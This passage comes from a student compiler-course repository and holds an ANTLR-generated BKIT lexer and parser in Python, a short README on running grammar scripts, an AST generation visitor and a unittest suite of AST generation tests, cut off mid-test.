buf.write(\"#\\16#\\u00fe\\13#\\3#\\5#\\u0101\\n#\\3$\\3$\\3%\\3%\\3%\\3%\\7%\\u0109\")\n buf.write(\"\\n%\\f%\\16%\\u010c\\13%\\3%\\3%\\3%\\3%\\3%\\3&\\3&\\3&\\3&\\7&\\u0117\")\n buf.write(\"\\n&\\f&\\16&\\u011a\\13&\\3&\\3&\\4\\u010a\\u0118\\2\\'\\3\\3\\5\\4\\7\")\n buf.write(\"\\5\\t\\6\\13\\2\\r\\2\\17\\2\\21\\2\\23\\2\\25\\2\\27\\2\\31\\2\\33\\2\\35\")\n buf.write(\"\\2\\37\\2!\\2#\\2%\\2\\'\\2)\\7+\\b-\\t/\\n\\61\\13\\63\\2\\65\\2\\67\\2\")\n buf.write(\"9\\2;\\2=\\2?\\2A\\fC\\rE\\16G\\17I\\20K\\21\\3\\2\\23\\3\\2c|\\3\\2C\\\\\")\n buf.write(\"\\3\\2\\62;\\4\\2--//\\3\\2\\\"\\\"\\t\\2))^^ddhhppttvv\\3\\2^^\\3\\2g\")\n buf.write(\"g\\3\\2\\60\\60\\3\\2))\\3\\2$$\\4\\2$$))\\5\\2\\62;CHch\\3\\2\\629\\6\")\n buf.write(\"\\2\\n\\f\\16\\17$$^^\\5\\2\\13\\f\\17\\17\\\"\\\"\\4\\3\\n\\f\\16\\17\\2\\u0126\")\n buf.write(\"\\2\\3\\3\\2\\2\\2\\2\\5\\3\\2\\2\\2\\2\\7\\3\\2\\2\\2\\2\\t\\3\\2\\2\\2\\2)\\3\")\n buf.write(\"\\2\\2\\2\\2+\\3\\2\\2\\2\\2-\\3\\2\\2\\2\\2/\\3\\2\\2\\2\\2\\61\\3\\2\\2\\2\\2\")\n buf.write(\"A\\3\\2\\2\\2\\2C\\3\\2\\2\\2\\2E\\3\\2\\2\\2\\2G\\3\\2\\2\\2\\2I\\3\\2\\2\\2\")\n 
buf.write(\"\\2K\\3\\2\\2\\2\\3N\\3\\2\\2\\2\\5^\\3\\2\\2\\2\\7a\\3\\2\\2\\2\\tg\\3\\2\\2\")\n buf.write(\"\\2\\13p\\3\\2\\2\\2\\rr\\3\\2\\2\\2\\17t\\3\\2\\2\\2\\21w\\3\\2\\2\\2\\23y\")\n buf.write(\"\\3\\2\\2\\2\\25{\\3\\2\\2\\2\\27\\u0081\\3\\2\\2\\2\\31\\u0083\\3\\2\\2\\2\")\n buf.write(\"\\33\\u008a\\3\\2\\2\\2\\35\\u0092\\3\\2\\2\\2\\37\\u009d\\3\\2\\2\\2!\\u009f\")\n buf.write(\"\\3\\2\\2\\2#\\u00a1\\3\\2\\2\\2%\\u00a3\\3\\2\\2\\2\\'\\u00a5\\3\\2\\2\\2\")\n buf.write(\")\\u00a7\\3\\2\\2\\2+\\u00a9\\3\\2\\2\\2-\\u00ab\\3\\2\\2\\2/\\u00ad\\3\")\n buf.write(\"\\2\\2\\2\\61\\u00af\\3\\2\\2\\2\\63\\u00b7\\3\\2\\2\\2\\65\\u00bf\\3\\2\")\n buf.write(\"\\2\\2\\67\\u00c7\\3\\2\\2\\29\\u00d0\\3\\2\\2\\2;\\u00d8\\3\\2\\2\\2=\\u00de\")\n buf.write(\"\\3\\2\\2\\2?\\u00e0\\3\\2\\2\\2A\\u00e8\\3\\2\\2\\2C\\u00f2\\3\\2\\2\\2\")\n buf.write(\"E\\u00f8\\3\\2\\2\\2G\\u0102\\3\\2\\2\\2I\\u0104\\3\\2\\2\\2K\\u0112\\3\")\n buf.write(\"\\2\\2\\2MO\\7$\\2\\2NM\\3\\2\\2\\2OP\\3\\2\\2\\2PN\\3\\2\\2\\2PQ\\3\\2\\2\")\n buf.write(\"\\2QX\\3\\2\\2\\2RT\\5;\\36\\2SR\\3\\2\\2\\2TW\\3\\2\\2\\2US\\3\\2\\2\\2U\")\n buf.write(\"V\\3\\2\\2\\2VY\\3\\2\\2\\2WU\\3\\2\\2\\2XU\\3\\2\\2\\2YZ\\3\\2\\2\\2ZX\\3\")\n buf.write(\"\\2\\2\\2Z[\\3\\2\\2\\2[\\\\\\3\\2\\2\\2\\\\]\\7$\\2\\2]\\4\\3\\2\\2\\2^_\\5\\21\")\n buf.write(\"\\t\\2_`\\5\\35\\17\\2`\\6\\3\\2\\2\\2ae\\5\\21\\t\\2bf\\5\\65\\33\\2cf\\5\")\n buf.write(\"\\63\\32\\2df\\5\\67\\34\\2eb\\3\\2\\2\\2ec\\3\\2\\2\\2ed\\3\\2\\2\\2f\\b\")\n buf.write(\"\\3\\2\\2\\2gm\\5? \\2hi\\5/\\30\\2ij\\5? 
\\2jl\\3\\2\\2\\2kh\\3\\2\\2\\2\")\n buf.write(\"lo\\3\\2\\2\\2mk\\3\\2\\2\\2mn\\3\\2\\2\\2n\\n\\3\\2\\2\\2om\\3\\2\\2\\2pq\")\n buf.write(\"\\t\\2\\2\\2q\\f\\3\\2\\2\\2rs\\t\\3\\2\\2s\\16\\3\\2\\2\\2tu\\t\\4\\2\\2u\\20\")\n buf.write(\"\\3\\2\\2\\2vx\\t\\5\\2\\2wv\\3\\2\\2\\2wx\\3\\2\\2\\2x\\22\\3\\2\\2\\2yz\\t\")\n buf.write(\"\\6\\2\\2z\\24\\3\\2\\2\\2{|\\7^\\2\\2|}\\t\\7\\2\\2}\\26\\3\\2\\2\\2~\\177\")\n buf.write(\"\\7^\\2\\2\\177\\u0082\\n\\7\\2\\2\\u0080\\u0082\\n\\b\\2\\2\\u0081~\\3\")\n buf.write(\"\\2\\2\\2\\u0081\\u0080\\3\\2\\2\\2\\u0082\\30\\3\\2\\2\\2\\u0083\\u0084\")\n buf.write(\"\\t\\t\\2\\2\\u0084\\u0086\\5\\21\\t\\2\\u0085\\u0087\\5\\17\\b\\2\\u0086\")\n buf.write(\"\\u0085\\3\\2\\2\\2\\u0087\\u0088\\3\\2\\2\\2\\u0088\\u0086\\3\\2\\2\\2\")\n buf.write(\"\\u0088\\u0089\\3\\2\\2\\2\\u0089\\32\\3\\2\\2\\2\\u008a\\u008e\\t\\n\")\n buf.write(\"\\2\\2\\u008b\\u008d\\5\\17\\b\\2\\u008c\\u008b\\3\\2\\2\\2\\u008d\\u0090\")\n buf.write(\"\\3\\2\\2\\2\\u008e\\u008c\\3\\2\\2\\2\\u008e\\u008f\\3\\2\\2\\2\\u008f\")\n buf.write(\"\\34\\3\\2\\2\\2\\u0090\\u008e\\3\\2\\2\\2\\u0091\\u0093\\5\\17\\b\\2\\u0092\")\n buf.write(\"\\u0091\\3\\2\\2\\2\\u0093\\u0094\\3\\2\\2\\2\\u0094\\u0092\\3\\2\\2\\2\")\n buf.write(\"\\u0094\\u0095\\3\\2\\2\\2\\u0095\\u009b\\3\\2\\2\\2\\u0096\\u0098\\5\")\n buf.write(\"\\33\\16\\2\\u0097\\u0099\\5\\31\\r\\2\\u0098\\u0097\\3\\2\\2\\2\\u0098\")\n buf.write(\"\\u0099\\3\\2\\2\\2\\u0099\\u009c\\3\\2\\2\\2\\u009a\\u009c\\5\\31\\r\")\n buf.write(\"\\2\\u009b\\u0096\\3\\2\\2\\2\\u009b\\u009a\\3\\2\\2\\2\\u009c\\36\\3\")\n buf.write(\"\\2\\2\\2\\u009d\\u009e\\t\\13\\2\\2\\u009e \\3\\2\\2\\2\\u009f\\u00a0\")\n buf.write(\"\\t\\f\\2\\2\\u00a0\\\"\\3\\2\\2\\2\\u00a1\\u00a2\\t\\r\\2\\2\\u00a2$\\3\")\n buf.write(\"\\2\\2\\2\\u00a3\\u00a4\\t\\16\\2\\2\\u00a4&\\3\\2\\2\\2\\u00a5\\u00a6\")\n buf.write(\"\\t\\17\\2\\2\\u00a6(\\3\\2\\2\\2\\u00a7\\u00a8\\7<\\2\\2\\u00a8*\\3\\2\")\n 
buf.write(\"\\2\\2\\u00a9\\u00aa\\7=\\2\\2\\u00aa,\\3\\2\\2\\2\\u00ab\\u00ac\\7\\60\")\n buf.write(\"\\2\\2\\u00ac.\\3\\2\\2\\2\\u00ad\\u00ae\\7.\\2\\2\\u00ae\\60\\3\\2\\2\")\n buf.write(\"\\2\\u00af\\u00b0\\7X\\2\\2\\u00b0\\u00b1\\7c\\2\\2\\u00b1\\u00b2\\7\")\n buf.write(\"t\\2\\2\\u00b2\\62\\3\\2\\2\\2\\u00b3\\u00b4\\7\\62\\2\\2\\u00b4\\u00b8\")\n buf.write(\"\\7z\\2\\2\\u00b5\\u00b6\\7\\62\\2\\2\\u00b6\\u00b8\\7Z\\2\\2\\u00b7\")\n buf.write(\"\\u00b3\\3\\2\\2\\2\\u00b7\\u00b5\\3\\2\\2\\2\\u00b8\\u00ba\\3\\2\\2\\2\")\n buf.write(\"\\u00b9\\u00bb\\5%\\23\\2\\u00ba\\u00b9\\3\\2\\2\\2\\u00bb\\u00bc\\3\")\n buf.write(\"\\2\\2\\2\\u00bc\\u00ba\\3\\2\\2\\2\\u00bc\\u00bd\\3\\2\\2\\2\\u00bd\\64\")\n buf.write(\"\\3\\2\\2\\2\\u00be\\u00c0\\5\\17\\b\\2\\u00bf\\u00be\\3\\2\\2\\2\\u00c0\")\n buf.write(\"\\u00c1\\3\\2\\2\\2\\u00c1\\u00bf\\3\\2\\2\\2\\u00c1\\u00c2\\3\\2\\2\\2\")\n buf.write(\"\\u00c2\\66\\3\\2\\2\\2\\u00c3\\u00c4\\7\\62\\2\\2\\u00c4\\u00c8\\7q\")\n buf.write(\"\\2\\2\\u00c5\\u00c6\\7\\62\\2\\2\\u00c6\\u00c8\\7Q\\2\\2\\u00c7\\u00c3\")\n buf.write(\"\\3\\2\\2\\2\\u00c7\\u00c5\\3\\2\\2\\2\\u00c8\\u00ca\\3\\2\\2\\2\\u00c9\")\n buf.write(\"\\u00cb\\5\\'\\24\\2\\u00ca\\u00c9\\3\\2\\2\\2\\u00cb\\u00cc\\3\\2\\2\")\n buf.write(\"\\2\\u00cc\\u00ca\\3\\2\\2\\2\\u00cc\\u00cd\\3\\2\\2\\2\\u00cd8\\3\\2\")\n buf.write(\"\\2\\2\\u00ce\\u00d1\\5\\13\\6\\2\\u00cf\\u00d1\\5\\r\\7\\2\\u00d0\\u00ce\")\n buf.write(\"\\3\\2\\2\\2\\u00d0\\u00cf\\3\\2\\2\\2\\u00d1:\\3\\2\\2\\2\\u00d2\\u00d9\")\n buf.write(\"\\n\\20\\2\\2\\u00d3\\u00d9\\5\\25\\13\\2\\u00d4\\u00d5\\5\\37\\20\\2\")\n buf.write(\"\\u00d5\\u00d6\\5!\\21\\2\\u00d6\\u00d9\\3\\2\\2\\2\\u00d7\\u00d9\\7\")\n buf.write(\"\\2\\2\\3\\u00d8\\u00d2\\3\\2\\2\\2\\u00d8\\u00d3\\3\\2\\2\\2\\u00d8\\u00d4\")\n buf.write(\"\\3\\2\\2\\2\\u00d8\\u00d7\\3\\2\\2\\2\\u00d9<\\3\\2\\2\\2\\u00da\\u00df\")\n buf.write(\"\\5)\\25\\2\\u00db\\u00df\\5+\\26\\2\\u00dc\\u00df\\5-\\27\\2\\u00dd\")\n 
buf.write(\"\\u00df\\5/\\30\\2\\u00de\\u00da\\3\\2\\2\\2\\u00de\\u00db\\3\\2\\2\\2\")\n buf.write(\"\\u00de\\u00dc\\3\\2\\2\\2\\u00de\\u00dd\\3\\2\\2\\2\\u00df>\\3\\2\\2\")\n buf.write(\"\\2\\u00e0\\u00e5\\5\\13\\6\\2\\u00e1\\u00e4\\5\\13\\6\\2\\u00e2\\u00e4\")\n buf.write(\"\\5\\17\\b\\2\\u00e3\\u00e1\\3\\2\\2\\2\\u00e3\\u00e2\\3\\2\\2\\2\\u00e4\")\n buf.write(\"\\u00e7\\3\\2\\2\\2\\u00e5\\u00e3\\3\\2\\2\\2\\u00e5\\u00e6\\3\\2\\2\\2\")\n buf.write(\"\\u00e6@\\3\\2\\2\\2\\u00e7\\u00e5\\3\\2\\2\\2\\u00e8\\u00ec\\7$\\2\\2\")\n buf.write(\"\\u00e9\\u00eb\\5;\\36\\2\\u00ea\\u00e9\\3\\2\\2\\2\\u00eb\\u00ee\\3\")\n buf.write(\"\\2\\2\\2\\u00ec\\u00ea\\3\\2\\2\\2\\u00ec\\u00ed\\3\\2\\2\\2\\u00ed\\u00ef\")\n buf.write(\"\\3\\2\\2\\2\\u00ee\\u00ec\\3\\2\\2\\2\\u00ef\\u00f0\\5\\27\\f\\2\\u00f0\")\n buf.write(\"B\\3\\2\\2\\2\\u00f1\\u00f3\\t\\21\\2\\2\\u00f2\\u00f1\\3\\2\\2\\2\\u00f3\")\n buf.write(\"\\u00f4\\3\\2\\2\\2\\u00f4\\u00f2\\3\\2\\2\\2\\u00f4\\u00f5\\3\\2\\2\\2\")\n buf.write(\"\\u00f5\\u00f6\\3\\2\\2\\2\\u00f6\\u00f7\\b\\\"\\2\\2\\u00f7D\\3\\2\\2\")\n buf.write(\"\\2\\u00f8\\u00fc\\7$\\2\\2\\u00f9\\u00fb\\5;\\36\\2\\u00fa\\u00f9\")\n buf.write(\"\\3\\2\\2\\2\\u00fb\\u00fe\\3\\2\\2\\2\\u00fc\\u00fa\\3\\2\\2\\2\\u00fc\")\n buf.write(\"\\u00fd\\3\\2\\2\\2\\u00fd\\u0100\\3\\2\\2\\2\\u00fe\\u00fc\\3\\2\\2\\2\")\n buf.write(\"\\u00ff\\u0101\\t\\22\\2\\2\\u0100\\u00ff\\3\\2\\2\\2\\u0101F\\3\\2\\2\")\n buf.write(\"\\2\\u0102\\u0103\\13\\2\\2\\2\\u0103H\\3\\2\\2\\2\\u0104\\u0105\\7,\")\n buf.write(\"\\2\\2\\u0105\\u0106\\7,\\2\\2\\u0106\\u010a\\3\\2\\2\\2\\u0107\\u0109\")\n buf.write(\"\\13\\2\\2\\2\\u0108\\u0107\\3\\2\\2\\2\\u0109\\u010c\\3\\2\\2\\2\\u010a\")\n buf.write(\"\\u010b\\3\\2\\2\\2\\u010a\\u0108\\3\\2\\2\\2\\u010b\\u010d\\3\\2\\2\\2\")\n buf.write(\"\\u010c\\u010a\\3\\2\\2\\2\\u010d\\u010e\\7,\\2\\2\\u010e\\u010f\\7\")\n buf.write(\",\\2\\2\\u010f\\u0110\\3\\2\\2\\2\\u0110\\u0111\\b%\\3\\2\\u0111J\\3\")\n 
buf.write(\"\\2\\2\\2\\u0112\\u0113\\7,\\2\\2\\u0113\\u0114\\7,\\2\\2\\u0114\\u0118\")\n buf.write(\"\\3\\2\\2\\2\\u0115\\u0117\\13\\2\\2\\2\\u0116\\u0115\\3\\2\\2\\2\\u0117\")\n buf.write(\"\\u011a\\3\\2\\2\\2\\u0118\\u0119\\3\\2\\2\\2\\u0118\\u0116\\3\\2\\2\\2\")\n buf.write(\"\\u0119\\u011b\\3\\2\\2\\2\\u011a\\u0118\\3\\2\\2\\2\\u011b\\u011c\\7\")\n buf.write(\"\\2\\2\\3\\u011cL\\3\\2\\2\\2\\37\\2PUZemw\\u0081\\u0088\\u008e\\u0094\")\n buf.write(\"\\u0098\\u009b\\u00b7\\u00bc\\u00c1\\u00c7\\u00cc\\u00d0\\u00d8\")\n buf.write(\"\\u00de\\u00e3\\u00e5\\u00ec\\u00f4\\u00fc\\u0100\\u010a\\u0118\")\n buf.write(\"\\4\\b\\2\\2\\2\\3\\2\")\n return buf.getvalue()\n\n\nclass BKITLexer(Lexer):\n\n atn = ATNDeserializer().deserialize(serializedATN())\n\n decisionsToDFA = [ DFA(ds, i) for i, ds in enumerate(atn.decisionToState) ]\n\n STRING = 1\n Real_number = 2\n Integer_number = 3\n Ids_list = 4\n COLON = 5\n SEMI = 6\n DOT = 7\n COMMA = 8\n VAR = 9\n ILLEGAL_ESCAPE = 10\n WS = 11\n UNCLOSE_STRING = 12\n ERROR_CHAR = 13\n BLOCK_COMMENT = 14\n UNTERMINATED_COMMENT = 15\n\n channelNames = [ u\"DEFAULT_TOKEN_CHANNEL\", u\"HIDDEN\" ]\n\n modeNames = [ \"DEFAULT_MODE\" ]\n\n literalNames = [ \"<INVALID>\",\n \"':'\", \"';'\", \"'.'\", \"','\", \"'Var'\" ]\n\n symbolicNames = [ \"<INVALID>\",\n \"STRING\", \"Real_number\", \"Integer_number\", \"Ids_list\", \"COLON\", \n \"SEMI\", \"DOT\", \"COMMA\", \"VAR\", \"ILLEGAL_ESCAPE\", \"WS\", \"UNCLOSE_STRING\", \n \"ERROR_CHAR\", \"BLOCK_COMMENT\", \"UNTERMINATED_COMMENT\" ]\n\n ruleNames = [ \"STRING\", \"Real_number\", \"Integer_number\", \"Ids_list\", \n \"LOWERCASE_LETTER\", \"UPPERCASE_LETTER\", \"DIGIT\", \"SIGN\", \n \"SPACE\", \"ESCAPE_SEQUENCE\", \"ESCAPE_ILLEGAL\", \"SCIENTIFIC\", \n \"DECIMAL_POINT\", \"FLOATING_POINT_NUM\", \"SING_QUOTE\", \"DOUBLE_QUOTE\", \n \"DOUBLE_QUOTE_IN_QUOTE\", \"HEXADECIMALDIGIT\", \"OCTALDIGIT\", \n \"COLON\", \"SEMI\", \"DOT\", \"COMMA\", \"VAR\", \"HEXADECIMAL\", \n \"DECIMAL\", \"OCTAL\", 
\"LETTER\", \"STRING_CHAR\", \"PUNCTUATION\", \n \"ID\", \"ILLEGAL_ESCAPE\", \"WS\", \"UNCLOSE_STRING\", \"ERROR_CHAR\", \n \"BLOCK_COMMENT\", \"UNTERMINATED_COMMENT\" ]\n\n grammarFileName = \"BKIT.g4\"\n\n def __init__(self, input=None, output:TextIO = sys.stdout):\n super().__init__(input, output)\n self.checkVersion(\"4.8\")\n self._interp = LexerATNSimulator(self, self.atn, self.decisionsToDFA, PredictionContextCache())\n self._actions = None\n self._predicates = None\n\n\n def emit(self):\n tk = self.type\n result = super().emit()\n if tk == self.UNCLOSE_STRING: \n raise UncloseString(result.text)\n elif tk == self.ILLEGAL_ESCAPE:\n raise IllegalEscape(result.text)\n elif tk == self.ERROR_CHAR:\n raise ErrorToken(result.text)\n elif tk == self.UNTERMINATED_COMMENT:\n raise UnterminatedComment()\n else:\n return result;\n\n num_tokens = 0\n\n\n" }, { "alpha_fraction": 0.6557971239089966, "alphanum_fraction": 0.6702898740768433, "avg_line_length": 15.235294342041016, "blob_id": "46765cc998eb138e5bd9c3bcd38b1247ae095346", "content_id": "8ba9a376a9a4119e9373f746b36719bcfad2bcb8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 276, "license_type": "no_license", "max_line_length": 51, "num_lines": 17, "path": "/README.md", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "# Principle of Programming Language\n## With Lab\nModified your grammer in ``file_name.g4``.\nRun:\n```bash\n./gen.sh file_name\n```\nTo clean your ``work_dir``:\n```bash\n./clean.sh\n```\n\n## Note\nIn case you do not have permission to run the file:\n```bash\nsudo chmod 777 file_name\n```\n" }, { "alpha_fraction": 0.6180607080459595, "alphanum_fraction": 0.6243523359298706, "avg_line_length": 38.75, "blob_id": "425454bd03261b5445a8b4e9135cff2035e8b45e", "content_id": "edbd214f58ab97e2a70e638c1ddd8d7501801d18", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 
2702, "license_type": "no_license", "max_line_length": 146, "num_lines": 68, "path": "/AST/assignment2/src/main/bkit/astgen/ASTGeneration.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "# class ASTGeneration(MPVisitor):\n \n# def visitProgram(self,ctx:MPParser.ProgramContext):\n# return self.visitExp(ctx.exp())\n\n# def visitExp(self,ctx:MPParser.ExpContext):\n# if ctx.ASSIGN():\n# return reduce(lambda rh,lh: Binary(ctx.ASSIGN(0).getText(), lh, rh), list(map(lambda term: self.visitTerm(term), ctx.term()))[::-1])\n# return self.visitTerm(ctx.term(0))\n\n# def visitTerm(self,ctx:MPParser.TermContext):\n# if ctx.COMPARE():\n# return Binary(ctx.COMPARE().getText(), self.visitFactor(ctx.factor(0)), self.visitFactor(ctx.factor(1)))\n# else:\n# return self.visitFactor(ctx.factor(0))\n\n# def visitFactor(self,ctx:MPParser.FactorContext):\n# if ANDOR():\n# return reduce(lambda rh,lh: Binary(ctx.ANDOR(0).getText(), rh, lh), list(map(lambda op: self.visitOperand(op), ctx.operand())))\n# return self.visitOperand(ctx.operand(0))\n\n# def visitOperand(self,ctx:MPParser.OperandContext):\n# if ctx.INTLIT():\n# return IntLiteral(int(ctx.INTLIT().getText()))\n\n# if ctx.BOOLIT():\n# return BooleanLiteral(bool(ctx.BOOLIT().getText()))\n \n# if ctx.ID():\n# return Id(ctx.ID().getText())\n \n# return self.visitExp(ctx.exp())\n\nfrom BKITVisitor import BKITVisitor\nfrom BKITParser import BKITParser\nfrom AST import *\nfrom functools import reduce\nclass ASTGeneration(BKITVisitor):\n \n def visitProgram(self,ctx:BKITParser.ProgramContext):\n return self.visitExp(ctx.exp())\n\n def visitExp(self,ctx:BKITParser.ExpContext):\n if ctx.ASSIGN():\n return reduce(lambda rh,lh: Binary(ctx.ASSIGN(0).getText(), lh, rh), list(map(lambda term: self.visitTerm(term), ctx.term()))[::-1])\n return self.visitTerm(ctx.term(0))\n\n def visitTerm(self,ctx:BKITParser.TermContext): \n if ctx.COMPARE():\n return Binary(ctx.COMPARE().getText(), self.visitFactor(ctx.factor(0)), 
self.visitFactor(ctx.factor(1)))\n return self.visitFactor(ctx.factor(0))\n\n def visitFactor(self,ctx:BKITParser.FactorContext):\n if ANDOR(0):\n return reduce(lambda lh,rh: Binary(ctx.ANDOR(0).getText(), lh, rh), list(map(lambda op: self.visitOperand(op), ctx.operand())))\n return self.visitOperand(ctx.operand(0))\n\n def visitOperand(self,ctx:BKITParser.OperandContext): \n if ctx.INTLIT():\n return IntLiteral(int(ctx.INTLIT().getText()))\n\n if ctx.BOOLIT():\n return BooleanLiteral(bool(ctx.BOOLIT().getText()))\n \n if ctx.ID():\n return Id(ctx.ID().getText())\n \n return self.visitExp(ctx.exp())" }, { "alpha_fraction": 0.5820682048797607, "alphanum_fraction": 0.612718403339386, "avg_line_length": 27.341463088989258, "blob_id": "f80210813bc6008779b37cb4ce9f64a29d161347", "content_id": "67128664176deb4aea6831f92c7bc1a99e9c4045", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3491, "license_type": "no_license", "max_line_length": 103, "num_lines": 123, "path": "/target/LexicalAnalysisParser.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "# Generated from LexicalAnalysis.g4 by ANTLR 4.8\n# encoding: utf-8\nfrom antlr4 import *\nfrom io import StringIO\nimport sys\nif sys.version_info[1] > 5:\n\tfrom typing import TextIO\nelse:\n\tfrom typing.io import TextIO\n\n\ndef serializedATN():\n with StringIO() as buf:\n buf.write(\"\\3\\u608b\\ua72a\\u8133\\ub9ed\\u417c\\u3be7\\u7786\\u5964\\3\\4\")\n buf.write(\"\\13\\4\\2\\t\\2\\4\\3\\t\\3\\3\\2\\3\\2\\3\\3\\3\\3\\3\\3\\2\\2\\4\\2\\4\\2\\2\")\n buf.write(\"\\2\\b\\2\\6\\3\\2\\2\\2\\4\\b\\3\\2\\2\\2\\6\\7\\3\\2\\2\\2\\7\\3\\3\\2\\2\\2\\b\")\n buf.write(\"\\t\\7\\3\\2\\2\\t\\5\\3\\2\\2\\2\\2\")\n return buf.getvalue()\n\n\nclass LexicalAnalysisParser ( Parser ):\n\n grammarFileName = \"LexicalAnalysis.g4\"\n\n atn = ATNDeserializer().deserialize(serializedATN())\n\n decisionsToDFA = [ DFA(ds, i) for i, ds in enumerate(atn.decisionToState) 
]\n\n sharedContextCache = PredictionContextCache()\n\n literalNames = [ ]\n\n symbolicNames = [ \"<INVALID>\", \"ID\", \"WS\" ]\n\n RULE_program = 0\n RULE_letter = 1\n\n ruleNames = [ \"program\", \"letter\" ]\n\n EOF = Token.EOF\n ID=1\n WS=2\n\n def __init__(self, input:TokenStream, output:TextIO = sys.stdout):\n super().__init__(input, output)\n self.checkVersion(\"4.8\")\n self._interp = ParserATNSimulator(self, self.atn, self.decisionsToDFA, self.sharedContextCache)\n self._predicates = None\n\n\n\n\n class ProgramContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n\n def getRuleIndex(self):\n return LexicalAnalysisParser.RULE_program\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitProgram\" ):\n return visitor.visitProgram(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def program(self):\n\n localctx = LexicalAnalysisParser.ProgramContext(self, self._ctx, self.state)\n self.enterRule(localctx, 0, self.RULE_program)\n try:\n self.enterOuterAlt(localctx, 1)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class LetterContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def ID(self):\n return self.getToken(LexicalAnalysisParser.ID, 0)\n\n def getRuleIndex(self):\n return LexicalAnalysisParser.RULE_letter\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitLetter\" ):\n return visitor.visitLetter(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def letter(self):\n\n localctx = LexicalAnalysisParser.LetterContext(self, self._ctx, self.state)\n self.enterRule(localctx, 2, 
self.RULE_letter)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 6\n self.match(LexicalAnalysisParser.ID)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n\n\n\n" }, { "alpha_fraction": 0.467327743768692, "alphanum_fraction": 0.4940249025821686, "avg_line_length": 33.81415939331055, "blob_id": "d0abc64fe9ecdf932d81185af4dfbc5c421c3c1c", "content_id": "85f29a479223c2c74cc21b9f2f3440a6efc188b3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3933, "license_type": "no_license", "max_line_length": 284, "num_lines": 113, "path": "/Assignments/assignment2/src1.0/test/ASTGenSuite.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "import unittest\nfrom TestUtils import TestAST\nfrom AST import *\n\nclass ASTGenSuite(unittest.TestCase):\n def test_simple_program(self):\n \"\"\"Simple program: int main() {} \"\"\"\n input = \"\"\"Var:x;\"\"\"\n expect = Program([VarDecl(Id(\"x\"),[],None)])\n self.assertTrue(TestAST.checkASTGen(input,expect,300))\n\n def test_var_decl_1(self):\n input = \"\"\"Var:x = 1;\"\"\"\n expect = Program([VarDecl(Id(\"x\"),[],IntLiteral(1))])\n self.assertTrue(TestAST.checkASTGen(input,expect,301))\n \n def test_var_decl_2(self):\n input = \"\"\"Var:x = 1, y;\"\"\"\n expect = Program([VarDecl(Id('y'), [], None),VarDecl(Id('x'),[],IntLiteral(1))])\n self.assertTrue(TestAST.checkASTGen(input,expect,302))\n\n def test_var_decl_3(self):\n input = \"\"\"Var:x = 1, y = \"abc\", z = 1e2, l=True, a[1][2]={{1},{2}};\"\"\"\n expect = Program([VarDecl(Id('x'),[],IntLiteral(1)),VarDecl(Id('y'),[],StringLiteral('abc')),VarDecl(Id('z'),[],FloatLiteral(100.0)),VarDecl(Id('l'),[],BooleanLiteral('True')),VarDecl(Id('a'),[1,2],ArrayLiteral([ArrayLiteral([IntLiteral(1)]),ArrayLiteral([IntLiteral(2)])]))])\n 
self.assertTrue(TestAST.checkASTGen(input,expect,303))\n\n def test_var_decl_4(self):\n input = \"\"\"Var:x[1] = {1};\"\"\"\n expect = Program([VarDecl(Id(\"x\"),[1],ArrayLiteral([IntLiteral(1)]))])\n self.assertTrue(TestAST.checkASTGen(input,expect,304))\n\n def test_var_decl_10(self): \n input = \"\"\"Var:x[1] = {1,2,3,4};\"\"\"\n expect = Program([VarDecl(Id(\"x\"),[1],ArrayLiteral([IntLiteral(1),IntLiteral(2),IntLiteral(3),IntLiteral(4)]))])\n self.assertTrue(TestAST.checkASTGen(input,expect,310))\n \n def test_func_decl_1(self):\n input = \"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n EndBody.\"\"\"\n\n expect = None\n self.assertTrue(TestAST.checkASTGen(input,expect,311))\n \n def test_func_decl_2(self):\n input = \"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n EndBody.\n Function: foo\n Parameter: a,b,c[1]\n Body:\n EndBody.\"\"\"\n expect = None\n self.assertTrue(TestAST.checkASTGen(input,expect,312))\n\n def test_func_decl_3(self):\n input = \"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n Var:x = 1, y;\n EndBody.\"\"\"\n expect = None\n self.assertTrue(TestAST.checkASTGen(input,expect,313))\n\n def test_if_stmt_1(self):\n input = \"\"\"Function: main\n Parameter: a\n Body:\n If 1 + a - b * foo() > 1 Then\n EndIf.\n EndBody.\"\"\"\n expect = None\n self.assertTrue(TestAST.checkASTGen(input,expect,321))\n\n\n def test_if_stmt_2(self):\n input = \"\"\"Function: main\n Parameter: a\n Body:\n If 1 Then\n EndIf.\n EndBody.\"\"\"\n expect = None\n self.assertTrue(TestAST.checkASTGen(input,expect,322))\n\n def test_if_stmt_3(self):\n input = \"\"\"Function: main\n Parameter: a\n Body:\n If 1 + 1 Then\n EndIf.\n EndBody.\"\"\"\n expect = None\n self.assertTrue(TestAST.checkASTGen(input,expect,323))\n\n def test_for_stmt_1(self):\n input = \"\"\"Function: main\n Parameter: a\n Body:\n If 1 + 1 Then\n For (i=1,i>1,1+2) Do\n Var: a=10,c[1]={1,2};\n c[foo() + 1] = a;\n 